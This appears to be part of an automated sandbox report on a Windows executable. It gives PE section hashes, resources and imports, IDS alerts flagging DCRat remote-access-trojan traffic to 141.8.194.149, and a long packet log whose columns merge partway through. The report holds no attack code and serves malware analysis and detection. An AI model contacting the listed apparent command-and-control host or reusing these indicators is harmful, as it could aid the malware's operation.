                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                   .text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                   .rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                   .data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .rsrc | 0x63000 | 0xdfd0 | 0xe000 | f6c0f34fae6331b50a7ad2efc4bfefdb | False | 0.6370326450892857 | data | 6.6367506404157535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                   .reloc | 0x71000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                   PNG | 0x63650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                   PNG | 0x64198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                   RT_ICON | 0x65748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                                   RT_ICON | 0x65cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                                   RT_ICON | 0x66558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                                   RT_ICON | 0x67400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                                   RT_ICON | 0x67868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                                   RT_ICON | 0x68910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                                   RT_ICON | 0x6aeb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                                   RT_DIALOG | 0x6f588 | 0x286 | data | English | United States | 0.5092879256965944
                                   RT_DIALOG | 0x6f358 | 0x13a | data | English | United States | 0.60828025477707
                                   RT_DIALOG | 0x6f498 | 0xec | data | English | United States | 0.6991525423728814
                                   RT_DIALOG | 0x6f228 | 0x12e | data | English | United States | 0.5927152317880795
                                   RT_DIALOG | 0x6eef0 | 0x338 | data | English | United States | 0.45145631067961167
                                   RT_DIALOG | 0x6ec98 | 0x252 | data | English | United States | 0.5757575757575758
                                   RT_STRING | 0x6ff68 | 0x1e2 | data | English | United States | 0.3900414937759336
                                   RT_STRING | 0x70150 | 0x1cc | data | English | United States | 0.4282608695652174
                                   RT_STRING | 0x70320 | 0x1b8 | data | English | United States | 0.45681818181818185
                                   RT_STRING | 0x704d8 | 0x146 | data | English | United States | 0.5153374233128835
                                   RT_STRING | 0x70620 | 0x446 | data | English | United States | 0.340036563071298
                                   RT_STRING | 0x70a68 | 0x166 | data | English | United States | 0.49162011173184356
                                   RT_STRING | 0x70bd0 | 0x152 | data | English | United States | 0.5059171597633136
                                   RT_STRING | 0x70d28 | 0x10a | data | English | United States | 0.49624060150375937
                                   RT_STRING | 0x70e38 | 0xbc | data | English | United States | 0.6329787234042553
                                   RT_STRING | 0x70ef8 | 0xd6 | data | English | United States | 0.5747663551401869
                                   RT_GROUP_ICON | 0x6ec30 | 0x68 | data | English | United States | 0.7019230769230769
                                   RT_MANIFEST | 0x6f810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                                   DLL | Import
                                   KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                   gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                                   Language of compilation system | Country where language is spoken | Map
                                   English | United States |
                                   Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                   2024-09-27T08:42:23.336887+0200 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49714 | 141.8.194.149 | 80 | TCP
                                   2024-09-27T08:42:44.758842+0200 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49715 | 141.8.194.149 | 80 | TCP
                                   2024-09-27T08:42:57.134633+0200 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49716 | 141.8.194.149 | 80 | TCP
                                   2024-09-27T08:43:21.620955+0200 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49718 | 141.8.194.149 | 80 | TCP
                                   2024-09-27T08:43:36.033260+0200 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49719 | 141.8.194.149 | 80 | TCP
                                   2024-09-27T08:43:53.823199+0200 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.9 | 49720 | 141.8.194.149 | 80 | TCP
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Sep 27, 2024 08:42:22.637758017 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:22.642633915 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:22.643263102 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:22.643987894 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:22.648855925 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.321708918 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.321749926 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.321768045 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.321784019 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.321798086 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.321813107 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.321827888 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.321844101 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.321857929 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.321871996 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.336886883 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:23.341792107 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.341845036 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.341861010 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.341876030 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.345356941 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:23.436616898 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.436640024 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.436655998 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.436671019 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.436687946 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.436717987 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:23.436764002 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:23.436923027 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.436938047 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.436955929 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.437174082 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:23.437485933 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.437501907 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.437525988 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.437549114 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.437557936 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:23.437566042 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.437591076 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:23.438431978 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.438478947 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:23.438517094 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.438533068 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.438549042 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.438565016 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.438571930 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:23.438627958 CEST | 49714 | 80 | 192.168.2.9 | 141.8.194.149
                                   Sep 27, 2024 08:42:23.439429998 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.439445019 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                   Sep 27, 2024 08:42:23.439459085 CEST | 80 | 49714 | 141.8.194.149 | 192.168.2.9
                                  Sep 27, 2024 08:42:23.439474106 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.439577103 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.451992989 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.452008009 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.452023983 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.459352970 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.551656008 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551680088 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551696062 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551709890 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551727057 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551740885 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551755905 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551770926 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551830053 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551913977 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551928043 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551943064 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.553873062 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.554033995 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.572715998 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.577567101 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780380964 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780410051 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780421972 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780436039 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780453920 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780459881 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.780467033 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780482054 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780483961 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.780493975 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780507088 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780520916 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.780544043 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.781527042 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781538010 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781549931 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781585932 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.781613111 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.781699896 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781712055 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781760931 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.781825066 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781923056 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781934977 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781965017 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.782052040 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782129049 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782133102 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.782140970 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782192945 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.782502890 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782562017 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782573938 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782613993 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.782618999 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782632113 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782644033 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782655001 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782680035 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.782793045 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.783430099 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783442020 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783456087 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783479929 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.783498049 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.783508062 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783519030 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783529997 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783543110 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783561945 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.783576012 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.784481049 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784492970 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784531116 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.784672976 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784686089 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784701109 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784712076 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784723997 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784730911 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.784748077 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.785177946 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785233974 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.785233974 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785320997 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785331964 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785343885 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785356045 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785367012 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785376072 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.785412073 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.786159039 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.793143988 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.081712008 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.088145018 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.088211060 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.088402987 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.094772100 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758685112 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758759975 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758783102 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758800983 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758816957 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758833885 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758841991 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.758841991 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.758852959 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758872986 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758886099 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758904934 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758933067 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.758934021 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.758979082 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.763771057 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.763787985 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.763803959 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.763818979 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.763931990 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.763931990 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.845395088 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873106003 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873131037 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873150110 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873164892 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.873167992 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873188019 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873204947 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873208046 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.873260021 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.873434067 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873478889 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873509884 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873524904 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873548985 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.873578072 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.874027967 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874084949 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874089003 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.874100924 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874118090 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874135971 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874177933 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.874207020 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.874767065 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874804974 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874820948 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874835968 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874855995 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874994040 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.874994040 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.878129959 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.878145933 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.878160000 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.878197908 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.878226995 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.886284113 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.886307001 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.886370897 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.932163954 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.932178974 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.932306051 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.987766981 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987803936 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987819910 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987838984 CEST8049715141.8.194.149192.168.2.9
